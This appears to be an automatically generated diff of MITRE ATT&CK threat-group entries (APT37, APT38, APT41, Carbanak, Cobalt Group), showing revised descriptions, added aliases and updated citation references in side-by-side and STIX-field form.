>, Are you Happy?, FreeMilk, Northern Korean Human Rights, an>l New Year, Are you Happy?, FreeMilk, North Korean Human Rig
>d Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Ci>hts, and Evil New Year 2018.(Citation: FireEye APT37 Feb 201
>tation: Securelist ScarCruft Jun 2016) (Citation: Talos Grou>8)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos 
>p123)  North Korean group definitions are known to have sign>Group123)  North Korean group definitions are known to have 
>ificant overlap, and the name [Lazarus Group](https://attack>significant overlap, and some security researchers report al
>.mitre.org/groups/G0032) is known to encompass a broad range>l North Korean state-sponsored cyber activity under the name
> of activity. Some organizations use the name Lazarus Group > [Lazarus Group](https://attack.mitre.org/groups/G0032) inst
>to refer to any activity attributed to North Korea.(Citation>ead of tracking clusters or subgroups.
>: US-CERT HIDDEN COBRA June 2017) Some organizations track N 
>orth Korean clusters or groups such as Bluenoroff,(Citation: 
> Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https:/ 
>/attack.mitre.org/groups/G0067), and [APT38](https://attack. 
>mitre.org/groups/G0082) separately, while other organization 
>s may track some activity associated with those group names  
>by the name Lazarus Group. 
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf
external_referenceshttps://securelist.com/operation-daybreak/75100/
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 18:55:20.925000+00:002021-10-15 16:54:01.193000+00:00
description[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123) North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
external_references[2]['source_name']ScarCruftRichochet Chollima
external_references[2]['description'](Citation: Securelist ScarCruft Jun 2016) (Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)(Citation: CrowdStrike Richochet Chollima September 2021)
external_references[3]['source_name']ReaperInkySquid
external_references[3]['description'](Citation: FireEye APT37 Feb 2018)(Citation: Volexity InkySquid BLUELIGHT August 2021)
external_references[4]['source_name']Group123ScarCruft
external_references[4]['description'](Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)
external_references[5]['source_name']TEMP.ReaperReaper
external_references[6]['source_name']FireEye APT37 Feb 2018Group123
external_references[6]['description']FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.(Citation: FireEye APT37 Feb 2018)
external_references[7]['source_name']Securelist ScarCruft Jun 2016TEMP.Reaper
external_references[7]['description']Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.(Citation: FireEye APT37 Feb 2018)
external_references[8]['source_name']Talos Group123FireEye APT37 Feb 2018
external_references[8]['description']Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
external_references[8]['url']https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.htmlhttps://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf
external_references[9]['source_name']US-CERT HIDDEN COBRA June 2017Securelist ScarCruft Jun 2016
external_references[9]['description']US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.
external_references[9]['url']https://www.us-cert.gov/ncas/alerts/TA17-164Ahttps://securelist.com/operation-daybreak/75100/
external_references[10]['source_name']Kaspersky Lazarus Under The Hood Blog 2017Talos Group123
external_references[10]['description']GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.
external_references[10]['url']https://securelist.com/lazarus-under-the-hood/77908/https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
external_references[11]['source_name']Securelist ScarCruft May 2019CrowdStrike Richochet Chollima September 2021
external_references[11]['description']GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.CrowdStrike. (2021, September 30). Adversary Profile - Richochet Chollima. Retrieved September 30, 2021.
external_references[11]['url']https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/https://adversary.crowdstrike.com/en-US/adversary/ricochet-chollima/
x_mitre_version1.52.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesRichochet Chollima
aliasesInkySquid
external_references{'source_name': 'Volexity InkySquid BLUELIGHT August 2021', 'description': 'Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.', 'url': 'https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/'}
external_references{'source_name': 'Securelist ScarCruft May 2019', 'description': 'GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.', 'url': 'https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/'}

[G0082] APT38

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[APT38](https://attack.mitre.org/groups/G0082) is a financiat1[APT38](https://attack.mitre.org/groups/G0082) is a North Ko
>lly-motivated threat group that is backed by the North Korea>rean state-sponsored threat group that specializes in financ
>n regime. The group mainly targets banks and financial insti>ial cyber operations; it has been attributed to the Reconnai
>tutions and has targeted more than 16 organizations in at le>ssance General Bureau.(Citation: CISA AA20-239A BeagleBoyz A
>ast 13 countries since at least 2014.(Citation: FireEye APT3>ugust 2020) Active since at least 2014, [APT38](https://atta
>8 Oct 2018)  North Korean group definitions are known to hav>ck.mitre.org/groups/G0082) has targeted banks, financial ins
>e significant overlap, and the name [Lazarus Group](https://>titutions, casinos, cryptocurrency exchanges, SWIFT system e
>attack.mitre.org/groups/G0032) is known to encompass a broad>ndpoints, and ATMs in at least 38 countries worldwide. Signi
> range of activity. Some organizations use the name Lazarus >ficant operations include the 2016 Bank of Bangladesh heist,
>Group to refer to any activity attributed to North Korea.(Ci> during which [APT38](https://attack.mitre.org/groups/G0082)
>tation: US-CERT HIDDEN COBRA June 2017) Some organizations t> stole $81 million, as well as attacks against Bancomext (20
>rack North Korean clusters or groups such as Bluenoroff,(Cit>18) and Banco de Chile (2018); some of their attacks have be
>ation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](h>en destructive.(Citation: CISA AA20-239A BeagleBoyz August 2
>ttps://attack.mitre.org/groups/G0067), and [APT38](https://a>020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North K
>ttack.mitre.org/groups/G0082) separately, while other organi>orea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under 
>zations may track some activity associated with those group >The Hood Blog 2017)  North Korean group definitions are know
>names by the name Lazarus Group.>n to have significant overlap, and some security researchers
 > report all North Korean state-sponsored cyber activity unde
 >r the name [Lazarus Group](https://attack.mitre.org/groups/G
 >0032) instead of tracking clusters or subgroups.
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://content.fireeye.com/apt/rpt-apt38
external_referenceshttps://www.us-cert.gov/ncas/alerts/TA17-164A
external_referenceshttps://securelist.com/lazarus-under-the-hood/77908/
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:50:43.737000+00:002021-10-15 16:33:27.982000+00:00
description[APT38](https://attack.mitre.org/groups/G0082) is a financially-motivated threat group that is backed by the North Korean regime. The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014.(Citation: FireEye APT38 Oct 2018) North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
external_references[2]['source_name']FireEye APT38 Oct 2018NICKEL GLADSTONE
external_references[2]['description']FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)
external_references[3]['source_name']US-CERT HIDDEN COBRA June 2017BeagleBoyz
external_references[3]['description']US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.(Citation: CISA AA20-239A BeagleBoyz August 2020)
external_references[4]['source_name']Kaspersky Lazarus Under The Hood Blog 2017Bluenoroff
external_references[4]['description']GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.(Citation: Kaspersky Lazarus Under The Hood Blog 2017)
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesNICKEL GLADSTONE
aliasesBeagleBoyz
aliasesBluenoroff
aliasesStardust Chollima
external_references{'source_name': 'Stardust Chollima', 'description': '(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)'}
external_references{'source_name': 'CISA AA20-239A BeagleBoyz August 2020', 'description': "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.", 'url': 'https://us-cert.cisa.gov/ncas/alerts/aa20-239a'}
external_references{'source_name': 'FireEye APT38 Oct 2018', 'description': 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.', 'url': 'https://content.fireeye.com/apt/rpt-apt38'}
external_references{'source_name': 'DOJ North Korea Indictment Feb 2021', 'description': 'Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.', 'url': 'https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and'}
external_references{'source_name': 'Kaspersky Lazarus Under The Hood Blog 2017', 'description': 'GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.', 'url': 'https://securelist.com/lazarus-under-the-hood/77908/'}
external_references{'source_name': 'SecureWorks NICKEL GLADSTONE profile Sept 2021', 'description': 'SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.', 'url': 'https://www.secureworks.com/research/threat-profiles/nickel-gladstone'}
external_references{'source_name': 'CrowdStrike Stardust Chollima Profile April 2018', 'description': 'Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.', 'url': 'https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/'}
external_references{'source_name': 'CrowdStrike GTR 2021 June 2021', 'description': 'CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf'}

[G0096] APT41

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[APT41](https://attack.mitre.org/groups/G0096) is a threat gt1[APT41](https://attack.mitre.org/groups/G0096) is a threat g
>roup that researchers have assessed as Chinese state-sponsor>roup that researchers have assessed as Chinese state-sponsor
>ed espionage group that also conducts financially-motivated >ed espionage group that also conducts financially-motivated 
>operations. [APT41](https://attack.mitre.org/groups/G0096) h>operations. Active since at least 2012, [APT41](https://atta
>as been active since as early as 2012. The group has been ob>ck.mitre.org/groups/G0096) has been observed targeting healt
>served targeting healthcare, telecom, technology, and video >hcare, telecom, technology, and video game industries in 14 
>game industries in 14 countries.(Citation: FireEye APT41 Aug>countries. [APT41](https://attack.mitre.org/groups/G0096) ov
> 2019)>erlaps at least partially with public reporting on groups in
 >cluding BARIUM and [Winnti Group](https://attack.mitre.org/g
 >roups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Gr
 >oup IB APT 41 June 2021) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Kyaw Pyiyt Htet, @KyawPyiytHtet']
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:13:46.915000+00:002021-10-15 00:28:08.413000+00:00
description[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. [APT41](https://attack.mitre.org/groups/G0096) has been active since as early as 2012. The group has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries.(Citation: FireEye APT41 Aug 2019)[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
external_references[4]['source_name']Crowdstrike GTR2020 Mar 2020Group IB APT 41 June 2021
external_references[4]['description']Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.
external_references[4]['url']https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdfhttps://blog.group-ib.com/colunmtk_apt41
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}

[G0008] Carbanak

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[Carbanak](https://attack.mitre.org/groups/G0008) is a threat1[Carbanak](https://attack.mitre.org/groups/G0008) is a cyber
>t group that mainly targets banks. It also refers to malware>criminal group that has used [Carbanak](https://attack.mitre
> of the same name ([Carbanak](https://attack.mitre.org/softw>.org/software/S0030) malware to target financial institution
>are/S0030)). It is sometimes referred to as [FIN7](https://a>s since at least 2013. [Carbanak](https://attack.mitre.org/g
>ttack.mitre.org/groups/G0046), but these appear to be two gr>roups/G0008) may be linked to groups tracked separately as [
>oups using the same [Carbanak](https://attack.mitre.org/soft>Cobalt Group](https://attack.mitre.org/groups/G0080) and [FI
>ware/S0030) malware and are therefore tracked separately. (C>N7](https://attack.mitre.org/groups/G0046) that have also us
>itation: Kaspersky Carbanak) (Citation: FireEye FIN7 April 2>ed [Carbanak](https://attack.mitre.org/software/S0030) malwa
>017)>re.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 Apr
 >il 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secure
 >works GOLD NIAGARA Threat Profile)(Citation: Secureworks GOL
 >D KINGSWOOD Threat Profile)
Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referenceshttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:17:57.921000+00:002021-10-18 21:02:30.899000+00:00
description[Carbanak](https://attack.mitre.org/groups/G0008) is a threat group that mainly targets banks. It also refers to malware of the same name ([Carbanak](https://attack.mitre.org/software/S0030)). It is sometimes referred to as [FIN7](https://attack.mitre.org/groups/G0046), but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: Kaspersky Carbanak) (Citation: FireEye FIN7 April 2017)[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)
external_references[3]['source_name']Carbon SpiderKaspersky Carbanak
external_references[3]['description'](Citation: Crowdstrike State of Criminal May 2016)Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
external_references[4]['source_name']Kaspersky CarbanakFireEye FIN7 April 2017
external_references[4]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
external_references[4]['url']https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdfhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
external_references[5]['source_name']FireEye FIN7 April 2017Europol Cobalt Mar 2018
external_references[5]['description']Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.htmlhttps://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain
external_references[6]['source_name']Fox-It Anunak Feb 2015Secureworks GOLD NIAGARA Threat Profile
external_references[6]['description']Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.
external_references[6]['url']https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/https://www.secureworks.com/research/threat-profiles/gold-niagara
external_references[7]['source_name']Crowdstrike State of Criminal May 2016Secureworks GOLD KINGSWOOD Threat Profile
external_references[7]['description']Johnston, R. (2016, May 16). State of the Criminal Address. Retrieved December 7, 2017.Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.
external_references[7]['url']https://www.crowdstrike.com/blog/state-criminal-address/https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Fox-It Anunak Feb 2015', 'description': 'Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.', 'url': 'https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/'}
iterable_item_removed
STIX FieldOld valueNew Value
aliasesCarbon Spider

[G0080] Cobalt Group

Current version: 2.0

Version changed from: 1.3 → 2.0


Old Description
New Description
t1[Cobalt Group](https://attack.mitre.org/groups/G0080) is a ft1[Cobalt Group](https://attack.mitre.org/groups/G0080) is a f
>inancially motivated threat group that has primarily targete>inancially motivated threat group that has primarily targete
>d financial institutions. The group has conducted intrusions>d financial institutions since at least 2016. The group has 
> to steal money via targeting ATM systems, card processing, >conducted intrusions to steal money via targeting ATM system
>payment systems and SWIFT systems. [Cobalt Group](https://at>s, card processing, payment systems and SWIFT systems. [Coba
>tack.mitre.org/groups/G0080) has mainly targeted banks in Ea>lt Group](https://attack.mitre.org/groups/G0080) has mainly 
>stern Europe, Central Asia, and Southeast Asia. One of the a>targeted banks in Eastern Europe, Central Asia, and Southeas
>lleged leaders was arrested in Spain in early 2018, but the >t Asia. One of the alleged leaders was arrested in Spain in 
>group still appears to be active. The group has been known t>early 2018, but the group still appears to be active. The gr
>o target organizations in order to use their access to then >oup has been known to target organizations in order to use t
>compromise additional victims. (Citation: Talos Cobalt Group>heir access to then compromise additional victims.(Citation:
> July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Ci> Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt G
>tation: PTSecurity Cobalt Dec 2016) (Citation: Group IB Coba>roup Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citatio
>lt Aug 2017) (Citation: Proofpoint Cobalt June 2017) (Citati>n: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt Jun
>on: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 201>e 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ C
>8) Reporting indicates there may be links between [Cobalt Gr>obalt Jan 2018) Reporting indicates there may be links betwe
>oup](https://attack.mitre.org/groups/G0080) and both the mal>en [Cobalt Group](https://attack.mitre.org/groups/G0080) and
>ware [Carbanak](https://attack.mitre.org/software/S0030) and> both the malware [Carbanak](https://attack.mitre.org/softwa
> the group [Carbanak](https://attack.mitre.org/groups/G0008)>re/S0030) and the group [Carbanak](https://attack.mitre.org/
>. (Citation: Europol Cobalt Mar 2018)>groups/G0008).(Citation: Europol Cobalt Mar 2018)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:27:29.519000+00:002021-10-18 22:02:12.586000+00:00
description[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. (Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Dec 2016) (Citation: Group IB Cobalt Aug 2017) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008). (Citation: Europol Cobalt Mar 2018)[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008).(Citation: Europol Cobalt Mar 2018)
external_references[2]['source_name']Cobalt GangGOLD KINGSWOOD
external_references[2]['description'](Citation: Talos Cobalt Group July 2018) (Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Secureworks GOLD KINGSWOOD September 2018)
external_references[3]['source_name']Cobalt SpiderCobalt Gang
external_references[3]['description'](Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Talos Cobalt Group July 2018) (Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Morphisec Cobalt Gang Oct 2018)
external_references[4]['source_name']Talos Cobalt Group July 2018Cobalt Spider
external_references[4]['description']Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.(Citation: Crowdstrike Global Threat Report Feb 2018)
external_references[5]['source_name']PTSecurity Cobalt Group Aug 2017Talos Cobalt Group July 2018
external_references[5]['description']Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
external_references[5]['url']https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdfhttps://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
external_references[6]['source_name']PTSecurity Cobalt Dec 2016PTSecurity Cobalt Group Aug 2017
external_references[6]['description']Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
external_references[6]['url']https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdfhttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf
external_references[7]['source_name']Group IB Cobalt Aug 2017PTSecurity Cobalt Dec 2016
external_references[7]['description']Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
external_references[7]['url']https://www.group-ib.com/blog/cobalthttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
external_references[8]['source_name']Proofpoint Cobalt June 2017Group IB Cobalt Aug 2017
external_references[8]['description']Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
external_references[8]['url']https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-targethttps://www.group-ib.com/blog/cobalt
external_references[9]['source_name']RiskIQ Cobalt Nov 2017Proofpoint Cobalt June 2017
external_references[9]['description']Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.
external_references[9]['url']https://www.riskiq.com/blog/labs/cobalt-strike/https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target
external_references[10]['source_name']RiskIQ Cobalt Jan 2018RiskIQ Cobalt Nov 2017
